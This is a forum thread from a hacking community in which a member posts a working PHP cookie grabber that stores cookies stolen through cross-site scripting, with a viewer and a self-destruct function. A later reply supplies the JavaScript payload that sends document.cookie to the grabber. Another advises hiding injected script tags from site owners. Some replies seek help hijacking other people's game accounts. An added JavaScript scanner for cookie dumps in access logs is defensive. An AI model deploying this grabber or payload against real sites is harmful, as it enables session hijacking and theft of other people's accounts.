Cookie Grabber #18904
09/23/05 12:23 AM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
I just realized that I never posted this. This is a cookie grabber for use with XSS vulnerabilities coded in PHP by me. It's simple yet powerful by allowing you to view the cookies through an XHTML interface. There are even login features if you choose to enable them.

Code
<?php
//Ghost's Cookie grabber v2.0

/* Begin Config Section */

//Password to access stolen cookies
$ConfigPassword = 'example123';

//File to write, chmodded 666
$CookieFile = "example.txt";

//Cookie name, use a-z A-Z 0-9 _
$ConfigCookie = 'make_this_a_complicated_string_a';

//Flag to identify you as wanting to retrieve cookies
$GetCookiesStr = "getcookies";
//Usage: http://www.sitename.tld/path/script.php?getcookies

//Flag to identify you as wanting to delete script and data file
$DeleteStr = "delete";
//Usage: http://www.sitename.tld/path/script.php?delete

//Name of variable you want to recover and store the stolen cookie
$StolenCookieStr = "str";
//Usage: http://www.sitename.tld/path/script.php?str=

//Place to send browser once cookie has been obtained
$Redirect = "http://www.google.com";

/* End Config Section */

$Self = $_SERVER['PHP_SELF'];
$GetCookies = $_GET["$GetCookiesStr"];
$Delete = $_GET["$DeleteStr"];
$StolenCookie = $_GET["$StolenCookieStr"];
/* Un-comment functions below for login features */

/*
//Remove the Symbols above (slash and asterisk) to enable login features.
//Remember to scroll down and remove the other part of the comment as well.
function LoggedIn()
{

global $ConfigCookie;
$Cookie = $_COOKIE["$ConfigCookie"];
if(isset($Cookie)) {
  return true;
} else {
  return false;
}

}

function LogIn()
{
global $ConfigCookie;
setcookie("$ConfigCookie");
DisplayCookies();
}

function Authenticate()
{
$Pass = $_POST['pass'];
global $ConfigPassword;
global $Self;

if($Pass == $ConfigPassword) {
   LogIn();
} else {
   ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Login</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <form action="<?php $Self; ?>" method="post">
   <table border="1" cellspacing="1" cellpadding="1" rules="rows" align="center" width="50%">
    <tr><th>Password</th><td align="center"><input type="password" name="pass" size="25"/></td></tr>
    <tr><td align="center" colspan="2"><input type="submit" value="Login" /></td></tr>
   </table>
  </form>
</body>
</html>

<?php
}

}
//Remove The symbols below (slash and asterisk) to enable login features
*/

function DisplayCookies()
{
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Cookie Details</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <table border="1" cellspacing="1" cellpadding="1" rules="all" align="center" width="75%">
   <tr><th colspan="6">Cookie Details</th></tr>
   <tr><th><small>IP Address</small></th><th><small>User Agent</small></th>
   <th><small>Referer</small></th><th><small>Cookie Values</small></th></tr>
<?php
global $DeleteStr;
global $CookieFile;
$handle = fopen("$CookieFile", "a+");
$CookieFileContent = fread($handle, filesize("$CookieFile"));
$i = 0;
$CookieFileExploded = explode("\n", $CookieFileContent);
$NumCFE = count($CookieFileExploded) - 1;
while($i < $NumCFE) {
$j = $i + 1;
$k = $j + 1;
$l = $k + 1;
echo '<tr><td align="center"><small>' . "$CookieFileExploded[$i]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$j]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$k]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$l]"
. '</small></td></tr>' . "\n";
$i = $i + 4;
}
?>
  </table>
  


  <center><b><a href="<?php echo $Self; ?>?<?php echo $DeleteStr; ?>"><pre><font color="#000">Delete Script and Datafile</font></pre></a></b></center>
</body>
</html>
<?php
}


function SelfDestruct()
{
global $CookieFile;
$FSSelf = __FILE__;
if(file_exists($CookieFile)) {
unlink($CookieFile);
}
unlink($FSSelf);
}



function WriteCookies()
{
global $CookieFile;
global $StolenCookie;
global $Redirect;
global $Path;
$IP = $_SERVER['REMOTE_ADDR'];
$Browser = $_SERVER['HTTP_USER_AGENT'];
$Referer = $_SERVER['HTTP_REFERER'];
if($Browser == NULL) {
$Browser = "NULL";
}

if($Referer == NULL) {
$Referer = "NULL";
}

if($StolenCookie == NULL) {
$StolenCookie = "NULL";
}

$handle = fopen("$CookieFile", "a+");
$Content = "$IP" . "\n" . "$Browser" . "\n" . "$Referer" . "\n" . "$StolenCookie" . "\n";
if(is_writeable("$CookieFile")) {
$Write = fwrite($handle, "$Content");
}
header("Location: $Redirect");
fclose($handle);
}

if(function_exists('LoggedIn') && LoggedIn()) {

if(isset($Delete)) {
SelfDestruct();
die();
}

DisplayCookies();

} elseif(isset($GetCookies)) {

if(function_exists('Authenticate')) {

Authenticate();

} else {
DisplayCookies();
}

} elseif(isset($Delete)) {
SelfDestruct();
die();
} else {
WriteCookies();
}
?>
(Feature added)

Re: Cookie Grabber #18905
09/23/05 05:27 PM
Joined: Dec 2002
Posts: 3,255
Likes: 3
Maryland
§intå× Offline
UGN Elite
Can you set it to grab all cookies a user has grabbed?

Re: Cookie Grabber #18906
09/23/05 08:29 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
If you mean by exporting the grabbed cookies somewhere other than they were hosted, you could do that by having the script request another URL via fopen with the cookie variable stored in the URL.

Re: Cookie Grabber #18907
01/14/06 04:23 AM
Joined: Jan 2006
Posts: 1
England
Spiky Offline
Junior Member
Could you tell me how to use it?

Re: Cookie Grabber #18908
01/14/06 04:00 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
I answered that question in the PM you sent me.

Re: Cookie Grabber #18909
01/16/06 01:58 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
Okay, people. I've been getting WAY too many private messages that could be resolved in this thread. If you have questions about this cookie grabber, or XSS in general, reply to this thread. If you need to, create a new thread, but DON'T private message me with that crap. I won't answer anything about this in a private message any longer. Private messages should be used to address things that cannot be dealt with in a public thread.

Re: Cookie Grabber #18910
01/16/06 03:18 PM
Joined: Jan 2006
Posts: 1
Hidden.
nalwieno Offline
Junior Member
The code doesn't seem to function correctly in xanga. Is this code supposed to stand alone?

Re: Cookie Grabber #18911
01/16/06 04:35 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
Yes.

Re: Cookie Grabber #18913
01/18/06 09:48 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
You can't just 'steal' cookies. You have to exploit a browser that trusts JavaScript. JavaScript combined with XSS (cross-site scripting) techniques will allow you to steal cookies.

I'd suggest searching for information about XSS, cookies, javascript, and the HTTP protocol.

Re: Cookie Grabber #18915
01/19/06 03:58 PM
Joined: Jan 2006
Posts: 4
Idaho
Neokd101 Offline
Junior Member
If you wanted to make it so that you coded this into a website and when someone visited it, it took their cookies, what would the code look like?

Re: Cookie Grabber #18916
01/19/06 04:14 PM
Joined: Jan 2006
Posts: 4
Idaho
Neokd101 Offline
Junior Member
and it sent the grabbed cookies to an email address

Re: Cookie Grabber #18917
01/19/06 05:56 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
..and it stole their neopets password?

Quote:
Originally posted by Neokd101:
have you heard of neopets?? Well if i wanted to cookie grab someones password and username and have it sent to a email address. what would the script look like. so if i put it on a webpage and they visited the webpage it took their username and password and sent it to my emai
haha....

Re: Cookie Grabber #18918
01/20/06 09:15 AM
Joined: Jan 2006
Posts: 4
Idaho
Neokd101 Offline
Junior Member
So can it be done?

Re: Cookie Grabber #18919
01/20/06 02:30 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
Yes it can be done, and I hope you don't expect a walk through.

If you want to know "If you wanted to make it so that you coded this into a website and when someone visited it, it took their cookies what and it sent the grabbe cookies to an email address woul the code look like", I suggest learning how to write PHP scripts or paying a professional to write it for you.

If you plan on utilizing such vulnerabilities, I expect you'll want to read about XSS, javascript, HTML, and the HTTP protocol.

Re: Cookie Grabber #18920
01/20/06 07:08 PM
Joined: Jan 2006
Posts: 4
Idaho
Neokd101 Offline
Junior Member
There would be no way I could get you to do it for me? I just was thinking that don't you have to tweak the code you posted above to get it to work.

Re: Cookie Grabber #18921
01/20/06 09:51 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
There is absolutely no way I would do this for you, other than you paying me for the services. The fact is, I wrote that script for my personal use. I released it publicly because I believed that some people may find a use for the code, and be able to include or adapt it for their own releases. I don't intend to write code updates for somebody who wants to use it for a really lame purpose that I honestly don't care about. As Gizmo has put it "We're not here to hold your hand while you piss."

So, to help you out here, I will NOT be writing code for you, and if I were you, I would think it unwise to keep persisting along this line of questioning.

Don't expect to come into a community like this, ask a question, and expect everyone to drop everything they're doing just to help you with your stupid little want to gain access to some lame account on some lame website. Those of us here who know how to write code have taken time and energy to do it, and having someone who has absolutely no knowledge on the subject, or a wish to learn on the subject, is insulting to all of us who do care about what we're learning and want to learn more.

Re: Cookie Grabber #18922
05/21/06 08:32 AM
Joined: May 2006
Posts: 1
no
danger Offline
Junior Member
How do you know their username when they log on?

Re: Cookie Grabber #18923
05/21/06 01:08 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
Don't even worry about it.

Re: Cookie Grabber [Re: Neokd101] #41165
11/01/06 07:15 PM
Joined: Nov 2006
Posts: 1
KurtK Offline
UGN Newbie
For those of you having trouble getting this to work, here's a hint:

<SCRIPT>location.href = "http://www.examplesite.com/script.php?str="+document.cookie</SCRIPT>

Thanks tons for this, Ghost.

Sorry for the necro-bump, but I stumbled on this thread through google and it really helped me out.

Last edited by KurtK; 11/01/06 07:17 PM.
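
The redirect in the post above puts the whole `document.cookie` string into a query parameter, which leaves a recognisable shape in proxy and web-server access logs. The following detection sketch is an added example, not part of the thread or of Ghost's script; the log lines, hosts and the session-name list are constructed assumptions.

```javascript
// Added example: flag logged requests whose query string looks like a
// document.cookie dump. Log lines are constructed (documentation IP ranges).
const SAMPLE_LOG = [
  '203.0.113.7 - - [01/Nov/2006:19:15:02 +0000] "GET /script.php?str=PHPSESSID=9f2c1a;%20theme=dark HTTP/1.1" 302 0',
  '203.0.113.9 - - [01/Nov/2006:19:16:40 +0000] "GET /search.php?q=cookie+recipes&page=2 HTTP/1.1" 200 5120',
  '198.51.100.4 - - [01/Nov/2006:19:17:11 +0000] "GET /c?d=sid%253Dabc%253B%2520lang%253Den HTTP/1.1" 302 0',
];

// document.cookie serialises as "name=value; name2=value2".
const PAIR = /^[^\s=;,]+=[^;]*$/;
const SESSION_NAME = /^(phpsessid|jsessionid|sid|sess\w*|auth\w*|token)=/i; // assumed list

function looksLikeCookieJar(value) {
  const parts = value.split(/;\s*/).filter(Boolean);
  if (parts.length === 0 || !parts.every((p) => PAIR.test(p))) return false;
  // Two or more pairs, or a single pair named like a session identifier.
  return parts.length >= 2 || SESSION_NAME.test(parts[0]);
}

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Returns the names of query parameters whose decoded value resembles a cookie jar.
function suspiciousParams(rawUrl) {
  const q = rawUrl.indexOf('?');
  if (q < 0) return [];
  const hits = [];
  for (const field of rawUrl.slice(q + 1).split('&')) {
    const eq = field.indexOf('=');
    if (eq < 0) continue;
    // Decode twice: values are sometimes double-encoded before they reach the log.
    const value = safeDecode(safeDecode(field.slice(eq + 1)));
    if (looksLikeCookieJar(value)) hits.push(safeDecode(field.slice(0, eq)));
  }
  return hits;
}

// Pulls the request target out of each combined-log-format line and checks it.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!m) continue;
    const params = suspiciousParams(m[1]);
    if (params.length) findings.push({ client: line.split(' ')[0], url: m[1], params });
  }
  return findings;
}
console.log(scanLog(SAMPLE_LOG));
```

Session cookies set with the `HttpOnly` attribute are not exposed through `document.cookie`, so they never appear in such a parameter.
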
Re: Cookie Grabber [Re: KurtK] #41166
11/01/06 11:45 PM
Joined: Feb 2002
Posts: 7,203
Likes: 11
Portland, OR; USA
Gremelin Offline
Community Owner
You may want to look up the validity for the script tags if embedding it randomly in sigs... keep in mind that a lot of sites are becoming more and more XHTML valid, and you'll give away what you're doing if it's throwing off the site's natural validity.


UGN Security, Back of the Web, and VNC Web Services Owner
Re: Cookie Grabber [Re: Gremelin] #41169
11/02/06 06:41 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
Ghost Offline OP
UGN Super Poster
It's a nice bit of code. I should really go through and remove the global variables though.

